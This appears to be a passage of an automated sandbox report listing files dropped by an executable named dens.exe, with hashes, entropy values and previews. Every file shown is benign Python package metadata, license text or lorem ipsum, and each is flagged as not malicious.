                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3658
                                                                                                                                                                                                                                            Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                                            MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                                            SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                                            SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                                            SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1500
                                                                                                                                                                                                                                            Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                                            MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                                            SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                                            SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                                            SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1335
                                                                                                                                                                                                                                            Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                            MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                            SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                            SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                            SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1053
                                                                                                                                                                                                                                            Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                                            SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                                            SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                                            SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36293
                                                                                                                                                                                                                                            Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                                            MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                                            SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                                            SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                                            SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1259
                                                                                                                                                                                                                                            Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                                            MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                                            SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                                            SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                                            SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                                            MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                                            SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                                            SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                                            SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                                            MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                                            SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                                            SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                                            SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10174
                                                                                                                                                                                                                                            Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                                            MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                                            SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                                            SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                                            SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1344
                                                                                                                                                                                                                                            Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                                            MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                                            SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                                            SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                                            SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3204
                                                                                                                                                                                                                                            Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                                            MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                                            SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                                            SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                                            SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2565
                                                                                                                                                                                                                                            Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                                            MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                                            SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                                            SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                                            SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                            MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                            SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
